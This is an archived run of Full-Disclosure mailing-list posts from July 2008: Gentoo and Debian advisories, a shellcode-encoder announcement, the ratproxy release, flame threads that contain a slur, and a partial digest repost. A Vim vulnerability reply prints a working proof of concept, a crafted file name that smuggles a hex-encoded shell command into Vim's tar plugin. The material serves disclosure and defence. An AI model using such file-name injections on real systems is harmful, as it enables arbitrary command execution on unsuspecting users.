     Package             /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  dev-lang/python        < 2.4.4-r13                    *>= 2.3.6-r6
                                                            >= 2.4.4-r13

Description
===========

Multiple vulnerabilities were discovered in Python:

* David Remahl reported multiple integer overflows in the file imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679). This issue is due to an incomplete fix for CVE-2007-4965.

* Justin Ferguson discovered that an integer signedness error in the zlib extension module might trigger insufficient memory allocation and a buffer overflow via a negative signed integer (CVE-2008-1721).

* Justin Ferguson discovered that insufficient input validation in the PyString_FromStringAndSize() function might lead to a buffer overflow (CVE-2008-1887).
Impact
======

A remote attacker could exploit these vulnerabilities to cause a Denial of Service or possibly the remote execution of arbitrary code with the privileges of the user running Python.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

The imageop module is no longer built in the unaffected versions.

All Python 2.3 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"

All Python 2.4 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"

References
==========

  [ 1 ] CVE-2008-1679
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679
  [ 2 ] CVE-2008-1721
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721
  [ 3 ] CVE-2008-1887
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/26592a7c/attachment.bin

From keytoaster at gentoo.org Tue Jul 1 12:59:36 2008
From: keytoaster at gentoo.org (Tobias Heinlein)
Date: Tue, 01 Jul 2008 13:59:36 +0200
Subject: [Full-disclosure] [ GLSA 200807-02 ] Motion: Execution of arbitrary code
Message-ID: <486A1C28.3010409@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200807-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Motion: Execution of arbitrary code
      Date: July 01, 2008
      Bugs: #227053
        ID: 200807-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Motion might result in the execution of arbitrary code.

Background
==========

Motion is a program that monitors the video signal from one or more cameras and is able to detect motions.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  media-video/motion       < 3.2.10.1                    >= 3.2.10.1

Description
===========

Nico Golde reported an off-by-one error within the read_client() function in the webhttpd.c file, leading to a stack-based buffer overflow. Stefan Cornelius (Secunia Research) reported a boundary error within the same function, also leading to a stack-based buffer overflow. Both vulnerabilities require that the HTTP Control interface is enabled.
Impact
======

A remote attacker could exploit these vulnerabilities by sending an overly long or specially crafted request to a vulnerable Motion HTTP control interface, possibly resulting in the execution of arbitrary code with the privileges of the motion user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Motion users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"

References
==========

  [ 1 ] CVE-2008-2654
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/b9cded25/attachment.bin

From berendjanwever at gmail.com Tue Jul 1 13:18:34 2008
From: berendjanwever at gmail.com (Berend-Jan Wever)
Date: Tue, 1 Jul 2008 14:18:34 +0200
Subject: [Full-disclosure] Alphanumeric shellcode improvements
Message-ID: <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9@mail.gmail.com>

Hi all,

I've not had as much opportunity in the last three years to contribute, but I do have some new stuff: I've decided to pre-release some parts of ALPHA3, the upcoming new version of my alphanumeric shellcode encoder:

* I've reduced the size of the mixedcase ascii decoder:
  http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86
* I've created a lowercase ascii decoder:
  http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86
* I've created a mixedcase ascii decoder for x64:
  http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64

See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and some documentation.

Cheers,

SkyLined

--
Berend-Jan "SkyLined" Wever
Email & Live messenger: berendjanwever at gmail.com

--
'The historical abuses of new data occurred between the time that a few people learned the important thing and the time when that important thing became general knowledge. To the Gowachin and to BuSab it was the "Data Gap," a source of constant danger.'
-- Frank Herbert, 'The Dosadi Experiment'

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/adf69bc9/attachment.html

From mrdkaaa at stream.cz Tue Jul 1 15:39:54 2008
From: mrdkaaa at stream.cz (mrdkaaa at stream.cz)
Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST)
Subject: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability
Message-ID: <4.4-28953-1047754371-1214923194@stream.cz>

This vulnerability is at least two years old. Anyway, what's the point of releasing a security advisory for a vendor well known to be never going to patch it?

From rdancer at rdancer.org Tue Jul 1 20:36:29 2008
From: rdancer at rdancer.org (Jan Minář)
Date: Tue, 1 Jul 2008 20:36:29 +0100
Subject: [Full-disclosure] Collection of Vulnerabilities in Fully Patched Vim 7.1
In-Reply-To: <200806141309.m5ED9bLg058230@moolenaar.net>
References: <6edf76c20806131543k4f78dec8y268eeee2468c7dea@mail.gmail.com> <200806141309.m5ED9bLg058230@moolenaar.net>
Message-ID: <6edf76c20807011236t7f96955h924c2692705b6ff4@mail.gmail.com>

On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar wrote:
>
> Jan Minar wrote:
>
>> 1. Summary
>>
>> Product  : Vim -- Vi IMproved
>> Version  : Tested with 7.1.314 and 6.4
>> Impact   : Arbitrary code execution
>> Wherefrom: Local and remote
>> Original : http://www.rdancer.org/vulnerablevim.html
>>
>> Improper quoting in some parts of Vim written in the Vim Script can lead to
>> arbitrary code execution upon opening a crafted file.
>
> Note that version 7.1.314, as reported in the Summary, does not have
> most of the reported problems. The problems in the plugins have also
> been fixed, this requires updating the runtime files. Information about
> that can be found at http://www.vim.org/runtime.php

I do apologize: as written in the advisory, the version I worked with was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have updated the advisory at http://www.rdancer.orgvulnerablevim.html . Thanks to Bram for all the good work.
7.2a.10 with updated runtime is still vulnerable to the zipplugin attack, and an updated tarplugin attack:

    -------------------------------------------
    -------- Test results below ---------------
    -------------------------------------------
    filetype.vim
        strong           : EXPLOIT FAILED
        weak             : EXPLOIT FAILED
        tarplugin        : EXPLOIT FAILED
        tarplugin.updated: VULNERABLE
        zipplugin        : VULNERABLE
    xpm.vim
        xpm              : EXPLOIT FAILED
        xpm2             : EXPLOIT FAILED
    remote               : EXPLOIT FAILED
    gzip_vim             : EXPLOIT FAILED
    netrw                : EXPLOIT FAILED

The original tarplugin exploit now produces a string of telling error messages:

    /bin/bash: so%: command not found
    tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    /bin/bash: retu: command not found
    /bin/bash: bar.tar|retu|'bar.tar: command not found

It's easy to see that it is still possible to execute arbitrary shell commands.

$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:

      136   if tarfile =~# '\.\(gz\|tgz\)$'
      137 "   call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
     *138    exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
      139   elseif tarfile =~# '\.lrp'
      140 "   call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
     *141    exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
      142   elseif tarfile =~# '\.bz2$'
      143 "   call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
     *144    exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
      145   else
      146 "   call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
    **147    exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
    [...]
      444 fun s:Escape(name)
      445 "  shellescape() was added by patch 7.0.111
      446   if exists("*shellescape")
      447    let qnameq= shellescape(a:name)
      448   else
      449    let qnameq= g:tar_shq . a:name . g:tar_shq
      450   endif
      451   return qnameq
      452 endfun

(*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.

(**) tar(1) allows arbitrary command execution via options ``--to-command'', and ``--use-compress-program''.

The updated tarplugin attack is rather simple:

    $ rm -rf ./*
    $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar"
    $ vim +:q ./foo*
    $ ls -l pwned
    -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned

Cheers,
Jan Minar.

From skx at debian.org Tue Jul 1 21:25:39 2008
From: skx at debian.org (Steve Kemp)
Date: Tue, 1 Jul 2008 21:25:39 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa packages fix denial of service
Message-ID: <20080701202539.GA32605@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1600-1                  security at debian.org
http://www.debian.org/security/                                 Steve Kemp
July 01, 2008                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : sympa
Vulnerability  : dos
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-1648
Debian Bug     : 475163

It was discovered that sympa, a modern mailing list manager, would crash when processing certain types of malformed messages.

For the stable distribution (etch), this problem has been fixed in version 5.2.3-1.2+etch1.

For the unstable distribution (sid), this problem has been fixed in version 5.3.4-4.

We recommend that you upgrade your sympa package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S
6REh7OX9zxqgWYGHqQWtEpQ=
=ANTa
-----END PGP SIGNATURE-----

From lcamtuf at dione.cc Wed Jul 2 01:02:02 2008
From: lcamtuf at dione.cc (Michal Zalewski)
Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST)
Subject: [Full-disclosure] [tool] ratproxy - passive web application security assessment tool
Message-ID:

Hi all,

I am happy to announce that we've just open sourced ratproxy - a free, passive web security assessment tool. This utility is designed to transparently analyze legitimate, browser-driven interactions with tested web applications - and automatically pinpoint, annotate, and prioritize potential flaws or areas of concern on the fly.
The proxy analyzes problems such as cross-site script inclusion threats, insufficient cross-site request forgery defenses, caching issues, potentially unsafe cross-domain code inclusion schemes and information leakage scenarios, and much more.

For a detailed discussion of the utility, please visit:
http://code.google.com/p/ratproxy/wiki/RatproxyDoc

Source code is available at:
http://code.google.com/p/ratproxy/downloads/list

And finally, screenshot of a sample report can be found here:
http://lcamtuf.coredump.cx/ratproxy-screen.png

The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since it is in beta, there might be some kinks to be ironed out, and not all web technologies might be properly accounted for. Feedback is appreciated.

Please keep in mind that the proxy is meant to highlight interesting patterns in web applications; a further analysis by a security professional is required to interpret the significance of results for a particular platform.

Cheers,
/mz

From filipe at balestra.com.br Wed Jul 2 06:19:01 2008
From: filipe at balestra.com.br (Filipe Balestra)
Date: Wed, 2 Jul 2008 02:19:01 -0300
Subject: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability
Message-ID:

mrdkaaa, are you saying that this vulnerability is not new to the public? The program phgrafx had some vulnerabilities published, but this one is not the same as any other that I can find in securityfocus. One program can have a lot of vulnerabilities :)

But yes, this vulnerability is at least four years old, but was not public. Anyway, QNX released Service Packs to solve some security problems in the past, and it's not our problem, we are advising the customers, they can choose or not the company. If you are a customer you probably would like to know about security issues in all products that you use.

Also, we agree it's a crap vuln, that's why we took too long to release it. Whatever, why hold it?
p.s.: Rodrigo and I are no longer working for Scanit, so it's just a personal opinion, not a company official position. If you want to know about the company vulnerability release process or any other information, please, contact the Scanit R&D team.

Cheers,
Filipe Alcarde Balestra

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/cd6c973d/attachment.html

From tonnerre.lombard at sygroup.ch Wed Jul 2 07:29:43 2008
From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard)
Date: Wed, 2 Jul 2008 08:29:43 +0200
Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
In-Reply-To:
References:
Message-ID: <20080702082943.2811aba5@wssyg117.sygroup-int.ch>

Salut,

On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:
> Are you ready for a site that isn't full of fagottry? Where Gadi cant
> steal your money or eat your lunches? Where you can freely submit
> lulz to be published? Where Theo's defeat and denial are brought to
> light? Wait no more!

You mean a site which evidently cannot tell the difference between local and remote root vulnerabilities? (The local root exploit for obsd4 which is published on that site contains a patch to increment the count of _remote_ vulnerabilities on the obsd web site.)

Tonnerre

--
SyGroup GmbH                     Tonnerre Lombard
Solutions Systematiques          Tel:+41 61 333 80 33
Güterstrasse 86                  Fax:+41 61 383 14 67
4053 Basel                       Web:www.sygroup.ch
                                 tonnerre.lombard at sygroup.ch

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 835 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/0174b22f/attachment.bin

From deepsec at deepsec.net Tue Jul 1 20:47:36 2008
From: deepsec at deepsec.net (DeepSec 2008)
Date: Tue, 01 Jul 2008 21:47:36 +0200
Subject: [Full-disclosure] Deepsec Talks 2007 are online - registration for 2008 is open
Message-ID: <486A89D8.2000303@deepsec.net>

Dear Madam, dear Sir,

DeepSec Vienna, the annual In-Depth Security Conference has opened online registrations for 2008. Registrations will receive a discount of 5% off the regular fees until August 31st if you use the following promotional code: earlybird-L4KZIEUE on our online registration form at https://deepsec.net/register/

Videos from 2007 are online:

Also we are happy to announce that talks from last year's conference are online. Listen to last year's talks in full length at:
http://video.google.com/videosearch?q=deepsec&sitesearch=#

Call for Papers still open for two weeks:

If you have some good ideas for a Talk at the conference and haven't decided yet to submit we encourage you to do so now. We still accept submissions at https://deepsec.net/cfp/ or via e-mail to: cfp at deepsec.net

We hope to hear from you and of course to meet in Vienna in November!

Best Regards,
Paul Böhm, René Pfeiffer, Michael Kafka
DeepSec GmbH

--
DeepSec In-Depth Security Conference
November 11th to 14th 2008, Vienna, Austria
https://deepsec.net/

From root_ at fibertel.com.ar Wed Jul 2 08:08:38 2008
From: root_ at fibertel.com.ar (root)
Date: Wed, 02 Jul 2008 04:08:38 -0300
Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
In-Reply-To:
References:
Message-ID: <486B2976.8000708@fibertel.com.ar>

You couldn't do the remote exploit even with a google video documenting it step by step. More like fail-disclosure.

staff wrote:
> Are you ready for a site that isn't full of fagottry?
Where Gadi cant steal > your money or eat your lunches? Where you can freely submit lulz to be > published? Where Theo's defeat and denial are brought to light? Wait no > more! > > http://lul-disclosure.net/ > > WhiteHat? BlackHat? We are lulzhat. > Fuck you and your hats. > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From gigiyousef at hotmail.com Wed Jul 2 12:15:35 2008 From: gigiyousef at hotmail.com (badr muhyeddin) Date: Wed, 2 Jul 2008 14:15:35 +0300 Subject: [Full-disclosure] Full-Disclosure Digest, Vol 41, Issue 3 In-Reply-To: References: Message-ID: > From: full-disclosure-request at lists.grok.org.uk> Subject: Full-Disclosure Digest, Vol 41, Issue 3> To: full-disclosure at lists.grok.org.uk> Date: Wed, 2 Jul 2008 12:00:01 +0100> > Send Full-Disclosure mailing list submissions to> full-disclosure at lists.grok.org.uk> > To subscribe or unsubscribe via the World Wide Web, visit> https://lists.grok.org.uk/mailman/listinfo/full-disclosure> or, via email, send a message with subject or body 'help' to> full-disclosure-request at lists.grok.org.uk> > You can reach the person managing the list at> full-disclosure-owner at lists.grok.org.uk> > When replying, please edit your Subject line so it is more specific> than "Re: Contents of Full-Disclosure digest..."> > > Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.> > > Today's Topics:> > 1. [ GLSA 200807-01 ] Python: Multiple integer overflows> (Tobias Heinlein)> 2. [ GLSA 200807-02 ] Motion: Execution of arbitrary code> (Tobias Heinlein)> 3. Alphanumeric shellcode improvements (Berend-Jan Wever)> 4. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation> Vulnerability (mrdkaaa at stream.cz)> 5. 
Re: Collection of Vulnerabilities in Fully Patched Vim 7.1> ( Jan Min?? )> 6. [SECURITY] [DSA 1560-1] New sympa packages fix denial of> service (Steve Kemp)> 7. [tool] ratproxy - passive web application security assessment> tool (Michal Zalewski)> 8. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation> Vulnerability (Filipe Balestra)> 9. Re: Full-Disclosure? introducing lul-disclosure.> (Tonnerre Lombard)> 10. Deepsec Talks 2007 are online - registration for 2008 is open> (DeepSec 2008)> 11. Re: Full-Disclosure? introducing lul-disclosure. (root)> > > ----------------------------------------------------------------------> > Message: 1> Date: Tue, 01 Jul 2008 13:51:43 +0200> From: Tobias Heinlein > Subject: [Full-disclosure] [ GLSA 200807-01 ] Python: Multiple integer> overflows> To: gentoo-announce at gentoo.org> Cc: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com,> security-alerts at linuxsecurity.com> Message-ID: <486A1A4F.1080404 at gentoo.org>> Content-Type: text/plain; charset="utf-8"> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> Gentoo Linux Security Advisory GLSA 200807-01> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> http://security.gentoo.org/> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Severity: Normal> Title: Python: Multiple integer overflows> Date: July 01, 2008> Bugs: #216673, #217221> ID: 200807-01> > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -> > Synopsis> ========> > Multiple integer overflows may allow for Denial of Service.> > Background> ==========> > Python is an interpreted, interactive, object-oriented programming> language.> > Affected packages> =================> > -------------------------------------------------------------------> Package / Vulnerable / Unaffected> -------------------------------------------------------------------> 1 dev-lang/python < 2.4.4-r13 *>= 2.3.6-r6> >= 2.4.4-r13> > 
Description> ===========> > Multiple vulnerabilities were discovered in Python:> > * David Remahl reported multiple integer overflows in the file> imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679).> This issue is due to an incomplete fix for CVE-2007-4965.> > * Justin Ferguson discovered that an integer signedness error in the> zlib extension module might trigger insufficient memory allocation> and a buffer overflow via a negative signed integer (CVE-2008-1721).> > * Justin Ferguson discovered that insufficient input validation in> the PyString_FromStringAndSize() function might lead to a buffer> overflow (CVE-2008-1887).> > Impact> ======> > A remote attacker could exploit these vulnerabilities to cause a Denial> of Service or possibly the remote execution of arbitrary code with the> privileges of the user running Python.> > Workaround> ==========> > There is no known workaround at this time.> > Resolution> ==========> > The imageop module is no longer built in the unaffected versions.> > All Python 2.3 users should upgrade to the latest version:> > # emerge --sync> # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"> > All Python 2.4 users should upgrade to the latest version:> > # emerge --sync> # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"> > References> ==========> > [ 1 ] CVE-2008-1679> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679> [ 2 ] CVE-2008-1721> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721> [ 3 ] CVE-2008-1887> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887> > Availability> ============> > This GLSA and any updates to it are available for viewing at> the Gentoo Security Website:> > http://security.gentoo.org/glsa/glsa-200807-01.xml> > Concerns?> =========> > Security is a primary focus of Gentoo Linux and ensuring the> confidentiality and security of our users machines is of utmost> importance to us. 
> Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
>
> The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/2.5
>
> ------------------------------
>
> Message: 2
> Date: Tue, 01 Jul 2008 13:59:36 +0200
> From: Tobias Heinlein
> Subject: [Full-disclosure] [ GLSA 200807-02 ] Motion: Execution of arbitrary code
> To: gentoo-announce at gentoo.org
> Cc: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com, security-alerts at linuxsecurity.com
> Message-ID: <486A1C28.3010409 at gentoo.org>
> Content-Type: text/plain; charset="utf-8"
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Gentoo Linux Security Advisory GLSA 200807-02
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Severity: Normal
> Title: Motion: Execution of arbitrary code
> Date: July 01, 2008
> Bugs: #227053
> ID: 200807-02
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> Multiple vulnerabilities in Motion might result in the execution of arbitrary code.
>
> Background
> ==========
>
> Motion is a program that monitors the video signal from one or more cameras and is able to detect motions.
>
> Affected packages
> =================
>
> -------------------------------------------------------------------
>  Package              /   Vulnerable   /                 Unaffected
> -------------------------------------------------------------------
>  1  media-video/motion    < 3.2.10.1                  >= 3.2.10.1
>
> Description
> ===========
>
> Nico Golde reported an off-by-one error within the read_client() function in the webhttpd.c file, leading to a stack-based buffer overflow. Stefan Cornelius (Secunia Research) reported a boundary error within the same function, also leading to a stack-based buffer overflow. Both vulnerabilities require that the HTTP Control interface is enabled.
>
> Impact
> ======
>
> A remote attacker could exploit these vulnerabilities by sending an overly long or specially crafted request to a vulnerable Motion HTTP control interface, possibly resulting in the execution of arbitrary code with the privileges of the motion user.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> All Motion users should upgrade to the latest version:
>
> # emerge --sync
> # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"
>
> References
> ==========
>
> [ 1 ] CVE-2008-2654
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
>
> http://security.gentoo.org/glsa/glsa-200807-02.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us.
> Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
>
> The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/2.5
>
> ------------------------------
>
> Message: 3
> Date: Tue, 1 Jul 2008 14:18:34 +0200
> From: "Berend-Jan Wever"
> Subject: [Full-disclosure] Alphanumeric shellcode improvements
> To: full-disclosure at lists.grok.org.uk
> Message-ID: <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9 at mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi all,
>
> I've not had as much opportunity in the last three years to contribute, but I do have some new stuff: I've decided to pre-release some parts of ALPHA3, the upcoming new version of my alphanumeric shellcode encoder:
> * I've reduced the size of the mixedcase ascii decoder:
> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86
> * I've created a lowercase ascii decoder:
> http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86
> * I've created a mixedcase ascii decoder for x64:
> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64
> See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and some documentation.
>
> Cheers,
> SkyLined
>
> --
> Berend-Jan "SkyLined" Wever
> Email & Live messenger: berendjanwever at gmail.com
> --
> 'The historical abuses of new data occurred between the time that a few people learned the important thing and the time when that important thing became general knowledge. To the Gowachin and to BuSab it was the "Data Gap," a source of constant danger.'
> -- Frank Herbert, 'The Dosadi Experiment'
>
> ------------------------------
>
> Message: 4
> Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST)
> From: mrdkaaa at stream.cz
> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability
> To: full-disclosure at lists.grok.org.uk
> Message-ID: <4.4-28953-1047754371-1214923194 at stream.cz>
> Content-Type: text/plain; charset="us-ascii"
>
> This vulnerability is at least two years old. Anyway, what's the point of releasing a security advisory for a vendor well known never to patch it?
>
> ------------------------------
>
> Message: 5
> Date: Tue, 1 Jul 2008 20:36:29 +0100
> From: "Jan Minář"
> Subject: Re: [Full-disclosure] Collection of Vulnerabilities in Fully Patched Vim 7.1
> To: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com, vim_dev at googlegroups.com, "Bram Moolenaar"
> Cc: bugs at vim.org
> Message-ID: <6edf76c20807011236t7f96955h924c2692705b6ff4 at mail.gmail.com>
> Content-Type: text/plain; charset=UTF-8
>
> On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar wrote:
> >
> > Jan Minar wrote:
> >
> >> 1. Summary
> >>
> >> Product  : Vim -- Vi IMproved
> >> Version  : Tested with 7.1.314 and 6.4
> >> Impact   : Arbitrary code execution
> >> Wherefrom: Local and remote
> >> Original : http://www.rdancer.org/vulnerablevim.html
> >>
> >> Improper quoting in some parts of Vim written in the Vim Script can lead to arbitrary code execution upon opening a crafted file.
> >
> > Note that version 7.1.314, as reported in the Summary, does not have most of the reported problems.
> > The problems in the plugins have also been fixed; this requires updating the runtime files. Information about that can be found at http://www.vim.org/runtime.php
>
> I do apologize: as written in the advisory, the version I worked with was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have updated the advisory at http://www.rdancer.org/vulnerablevim.html .
>
> Thanks to Bram for all the good work.
>
> 7.2a.10 with updated runtime is still vulnerable to the zipplugin attack, and an updated tarplugin attack:
>
> -------------------------------------------
> -------- Test results below ---------------
> -------------------------------------------
> filetype.vim
>   strong           : EXPLOIT FAILED
>   weak             : EXPLOIT FAILED
>   tarplugin        : EXPLOIT FAILED
>   tarplugin.updated: VULNERABLE
>   zipplugin        : VULNERABLE
> xpm.vim
>   xpm              : EXPLOIT FAILED
>   xpm2             : EXPLOIT FAILED
> remote             : EXPLOIT FAILED
> gzip_vim           : EXPLOIT FAILED
> netrw              : EXPLOIT FAILED
>
> The original tarplugin exploit now produces a string of telling error messages:
>
> /bin/bash: so%: command not found
> tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory
> tar: Error is not recoverable: exiting now
